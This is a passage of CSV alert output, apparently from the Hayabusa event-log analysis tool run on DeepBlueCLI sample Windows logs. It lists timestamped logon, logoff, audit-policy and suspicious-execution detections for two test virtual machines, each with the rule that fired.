.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event 